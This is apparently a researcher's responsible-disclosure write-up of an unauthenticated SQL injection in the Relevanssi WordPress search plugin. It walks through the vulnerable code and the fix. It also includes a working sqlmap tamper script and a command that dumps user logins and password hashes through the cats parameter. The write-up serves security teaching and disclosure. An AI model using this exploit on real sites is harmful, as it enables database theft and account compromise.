How I found SQL injection on 100,000 WordPress sites

I recently reported an unauthenticated SQL injection in Relevanssi, a WordPress search plugin that was active on more than 100,000 sites. There were two things that made this bug especially fun to work on: first, a type confusion issue where input that only looked like a numeric term ID could carry extra SQL with it, and second, an exploitation trick where one SQL injection payload was smuggled inside another in order to get around the limitations of the first query.

In this post I’ll walk through the code path, show why the bug was exploitable, and explain how I turned it into a practical blind SQL injection through the cats and tags search parameters.

Relevanssi is a plugin that replaces the default WordPress search with a more advanced search engine. It adds features like better relevance ranking and extra filtering options, and those extra search features are what made this bug reachable through public query parameters.

The vulnerable input

Among the extra query parameters Relevanssi accepts for filtering search results are cats and tags, which filter by category and tag.

For categories, the plugin reads the cats parameter, splits it on commas, and stores the resulting values as term IDs:

if ( isset( $query->query_vars['cats'] ) ) {
	$cat = $query->query_vars['cats'];
	if ( is_array( $cat ) ) {
		$cat = implode( ',', $cat );
	}
}
if ( empty( $cat ) ) {
	$cat = get_option( 'relevanssi_cat' );
}
if ( $cat ) {
	$cat         = explode( ',', $cat );
	$tax_query[] = array(
		'taxonomy' => 'category',
		'field'    => 'term_id',
		'terms'    => $cat,
		'operator' => 'IN',
	);
}

The tags parameter is handled in a similar way. In both cases, the plugin expects to be dealing with term IDs, and later code relies on that assumption.

Where things go wrong

The bug appears later, when Relevanssi processes the taxonomy query and tries to turn those user-supplied term values into term taxonomy IDs.

foreach ( $terms_parameter as $name ) {
	$term = get_term_by( $field_name, $name, $taxonomy );
	if ( ! $term ) {
		if ( ctype_digit( strval( $name ) ) ) {
			$numeric_terms[] = $name;
		}
	} elseif ( isset( $term->term_id ) && in_array( $field_name, array( 'slug', 'name' ), true ) ) {
		$names[] = "'" . esc_sql( $name ) . "'";
	} else {
		$numeric_terms[] = $name;
	}
}

return array(
	'numeric_terms' => implode( ',', $numeric_terms ),
	'term_in'       => implode( ',', $names ),
);

The important branch is the final else. When the lookup field is term_id and get_term_by() returns a term object, the original value is appended to the numeric_terms array without any numeric validation. The ctype_digit() check only runs when the lookup fails.

That sounds harmless at first, until you look at how WordPress handles term lookups by ID:

if ( 'id' === $field || 'ID' === $field || 'term_id' === $field ) {
	$term = get_term( (int) $value, $taxonomy, $output, $filter );
	if ( is_wp_error( $term ) || null === $term ) {
		$term = false;
	}
	return $term;
}

The value is cast to an integer before the lookup. That means a string like 1foo is treated as the term ID 1 for the lookup, and if term ID 1 exists, the lookup succeeds. But the original string, 1foo, is what gets added to numeric_terms.

This is the kind of PHP quirk that leads to bugs in code that looks reasonable at first glance. An explicit (int) cast turns 1foo into 1 silently, without raising a warning even in PHP 8, so the lookup succeeds while the value Relevanssi keeps is still the original tainted string. The plugin then treats that string as if it had been validated as a proper numeric ID.
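
The mismatch can be reproduced outside PHP. The sketch below is a rough Python model, not Relevanssi or WordPress code: php_int_cast and is_ctype_digit only approximate PHP's (int) cast and ctype_digit() for simple inputs, and existing_term_ids is a hypothetical site where only term ID 1 exists.

```python
import re

# Hypothetical site: only term ID 1 exists.
existing_term_ids = {1}


def php_int_cast(value):
    """Rough model of PHP's (int) cast on a string: keep the leading integer, else 0."""
    match = re.match(r"\s*[+-]?[0-9]+", value)
    return int(match.group()) if match else 0


def is_ctype_digit(value):
    """Rough model of ctype_digit(): non-empty and made of ASCII digits only."""
    return value != "" and all(c in "0123456789" for c in value)


def collect_numeric_terms(raw_values):
    """Mirror the term_id branch: the lookup uses the cast value, the list keeps the raw one."""
    numeric_terms = []
    for raw in raw_values:
        term_found = php_int_cast(raw) in existing_term_ids
        if term_found or is_ctype_digit(raw):
            numeric_terms.append(raw)  # raw string, not the cast integer
    return numeric_terms


print(collect_numeric_terms(["1foo", "7", "2bar", "abc"]))
# ['1foo', '7']
```

In this model 1foo survives because the cast value matches an existing term, while 2bar is dropped because the lookup fails and the digit check rejects it.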

The injection point

Eventually those values are concatenated into a SQL query:

if ( ! empty( $numeric_terms ) ) {
	$type    = 'term_id';
	$term_in = $numeric_terms;
}

if ( ! empty( $term_in ) ) {
	$row_taxonomy = sanitize_text_field( $row['taxonomy'] );

	$tt_q = "SELECT tt.term_taxonomy_id
			  FROM $wpdb->term_taxonomy AS tt
			  LEFT JOIN $wpdb->terms AS t ON (tt.term_id=t.term_id)
			  WHERE tt.taxonomy = '$row_taxonomy' AND t.$type IN ($term_in)";
	$term_tax_id = $wpdb->get_col( $tt_q );
}

At this point, the assumption is that $term_in contains only numeric IDs separated by commas. But because the original value was never converted to an integer, attacker-controlled SQL can be smuggled into the IN (...) clause.
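
To make the effect of the concatenation concrete, here is a minimal Python sketch that assembles the same query text. The function name build_term_taxonomy_query is hypothetical, the wp_ table prefix is an assumption (it is only the WordPress default), and the second input is a deliberately harmless illustration of a value that starts with a valid ID.

```python
def build_term_taxonomy_query(taxonomy, term_in, prefix="wp_"):
    """Assemble the query text the same way the plugin does: plain string interpolation."""
    return (
        "SELECT tt.term_taxonomy_id "
        f"FROM {prefix}term_taxonomy AS tt "
        f"LEFT JOIN {prefix}terms AS t ON (tt.term_id=t.term_id) "
        f"WHERE tt.taxonomy = '{taxonomy}' AND t.term_id IN ({term_in})"
    )


# Expected input: a comma-separated list of numeric IDs.
print(build_term_taxonomy_query("category", "1,2"))

# Tainted input: the text after the leading "1" becomes part of the SQL itself.
print(build_term_taxonomy_query("category", "1) OR (1=1"))
```

The second query ends in IN (1) OR (1=1), so the WHERE clause no longer means what the plugin intended.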

In practice, the payload has to begin with a valid term ID. For categories that is easy enough, because category ID 1 is usually the default Uncategorized category and cannot be deleted.

So the shape of the request is simple:

?s=vulnerable&cats=1<payload>

The s parameter just needs to contain some ordinary search term, while the payload is carried in cats or tags.

Exploiting it in practice

By default, the result of the injected query is not reflected directly in the search results. The query is mainly used to build restrictions that later affect which posts are returned. Because of that, the practical route is blind SQL injection, and a time-based attack works well.

But there is another twist here.

The first injected query is awkward to work with directly. The cats value is split on commas before each piece is looked up as a term, so the payload itself cannot contain commas. This was a problem for sqlmap, as it uses the SQL IF() function in its generated queries, and IF() separates its arguments with commas.
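
A small Python sketch shows what the comma split does to such a payload. The function name split_like_explode is hypothetical and simply mirrors PHP's explode( ',', $cat ); the payload string is an illustrative example, not one taken from sqlmap.

```python
def split_like_explode(raw):
    """Mirror explode(',', $cat): every comma starts a new term value."""
    return raw.split(",")


payload = "1 AND IF(1=1,SLEEP(2),0)"
print(split_like_explode(payload))
# ['1 AND IF(1=1', 'SLEEP(2)', '0)']
```

Each piece is then looked up as a separate term, so the IF() expression never reaches the query in one piece.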

The workaround I used was to smuggle a second SQL payload inside the first one. It turns out that the results of the first query are used in a later query, and that later query is also vulnerable to SQL injection. So instead of trying to make the initial injection do all the work, I used it to output a hex-encoded SQL fragment that would then be reused by the later query.

That hex-encoding step is worth pausing on, because it is not very intuitive if you have not run into it before. In MySQL, a value like 0x414243 is interpreted as the string ABC. That means you can represent an entire SQL fragment as hexadecimal and avoid using quotes, commas, and other awkward characters in the first injection point.
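
As a quick illustration, the following Python sketch converts text to a MySQL-style hex literal and back. The helper names are hypothetical, and UTF-8 is assumed as the encoding.

```python
def to_mysql_hex_literal(text):
    """Encode text as a 0x... hex literal (UTF-8 bytes, uppercase hex digits)."""
    return "0x" + text.encode("utf-8").hex().upper()


def from_mysql_hex_literal(literal):
    """Decode a 0x... hex literal back into text."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


print(to_mysql_hex_literal("ABC"))
# 0x414243

fragment = "IF(1=1,'a','b')"
encoded = to_mysql_hex_literal(fragment)
# The encoded form contains no commas or quotes, yet decodes to the same text.
print("," in encoded, "'" in encoded)
# False False
print(from_mysql_hex_literal(encoded) == fragment)
# True
```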

The second injection point looked like this:

$query_restrictions .= " AND relevanssi.doc $tq_operator (
	SELECT DISTINCT(tr.object_id)
		FROM $wpdb->term_relationships AS tr
		WHERE tr.term_taxonomy_id IN ($term_tax_id))";
// Clean: all variables are Relevanssi-generated.

The $term_tax_id variable holds the result of the previous query containing the smuggled SQL.
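
The second stage can be sketched in Python as well. Several details here are assumptions: the function name build_restriction is hypothetical, the rows from the first query are assumed to be joined with commas, $tq_operator is assumed to be IN, the wp_ prefix is the WordPress default, and the row value is an illustrative string rather than a real sqlmap payload.

```python
def build_restriction(term_tax_ids, operator="IN", prefix="wp_"):
    """Assemble the second query fragment from the rows returned by the first query."""
    term_tax_id = ",".join(term_tax_ids)  # assumption: rows are comma-joined
    return (
        f" AND relevanssi.doc {operator} ("
        "SELECT DISTINCT(tr.object_id) "
        f"FROM {prefix}term_relationships AS tr "
        f"WHERE tr.term_taxonomy_id IN ({term_tax_id}))"
    )


# Normal case: the first query returned numeric term taxonomy IDs.
print(build_restriction(["1", "5"]))

# Smuggled case: the first query returned a decoded SQL fragment as its only row.
print(build_restriction(["1)) AND SLEEP(2)#"]))
```

In the smuggled case the fragment ends in IN (1)) AND SLEEP(2)#)), which shows why the payload needs two closing parentheses before its own condition: one for the IN list and one for the subquery.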

To implement this, I used an sqlmap tamper script, which rewrites each generated payload on the fly before it is sent. My tamper script looked like this:

#!/usr/bin/env python

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


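def hex_encode(text: str) -> str:
    # Encode the text as a MySQL hex literal (0x...), which needs no quotes or commas.
    return "0x" + "".join("{:02X}".format(ord(c)) for c in text)


def tamper(payload, **kwargs):
    # Nothing to wrap if sqlmap passes an empty payload.
    if not payload:
        return payload
    # Use "#" as the comment marker instead of "--".
    payload = payload.replace("--", "#")
    # First stage: close the IN (...) list, make the original SELECT match nothing,
    # and return the hex-encoded second-stage payload as the only row.
    # VALUES ROW(...) needs MySQL 8.0.19 or later.
    return f"1) AND 1=2 UNION VALUES ROW({hex_encode(payload)})#"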

And the corresponding sqlmap command was:

sqlmap --url="<site-url>?s=vulnerable&cats=1" \
  -p cats \
  --dbms=mysql \
  --level=1 \
  --risk=1 \
  --technique=T \
  --tamper=tamper/hex_encode_tax_query.py \
  --prefix="))" \
  --time-sec=2 \
  --answers="include all tests=n,keep testing=n,store hashes=n,crack=n" \
  --dump -T wp_users -C user_login,user_pass

That was enough to turn the issue into a working time-based blind SQL injection and dump data from the database.

Demo

I recorded a short demo showing the exploitation flow in practice, from the vulnerable search request to the working blind SQL injection.

Fixing the bug

The fix here is simple in principle: values that are supposed to be numeric IDs should be converted to integers before they ever reach the SQL query.

For example, the plugin could cast the values before joining them:

$numeric_terms[] = absint( $name );

It would also help to validate cats and tags earlier, when they are first read from the query parameters:

$cat = array_map( 'absint', explode( ',', $cat ) );
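
The effect of that sanitisation can be modelled in a few lines of Python. This is only a sketch: absint_model approximates WordPress's absint() for string input, and safe_term_in is a hypothetical helper, not plugin code.

```python
import re


def absint_model(value):
    """Rough model of absint(): leading integer of the string as a non-negative int, else 0."""
    match = re.match(r"\s*[+-]?[0-9]+", value)
    return abs(int(match.group())) if match else 0


def safe_term_in(raw):
    """Split on commas, force every piece to an integer, and rejoin for the IN (...) list."""
    return ",".join(str(absint_model(piece)) for piece in raw.split(","))


print(safe_term_in("1) OR (1=1"))
# 1
print(safe_term_in("3,1foo,abc"))
# 3,1,0
```

Whatever follows the leading digits is discarded, so only integers can reach the query.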

The broader lesson is that a successful lookup is not proof that the original input is safe. In this case, WordPress was willing to cast a string to an integer during the lookup, but Relevanssi later reused the original string as if it were already trusted numeric data.

Timeline

  • 2025-05-03 — Report submitted to Wordfence.
  • 2025-05-07 — Report triaged and bounty of $881 awarded.
  • 2025-05-07 — Relevanssi developer released fixed version 4.24.5.
  • 2025-05-12 — Advisory published as CVE-2025-4396.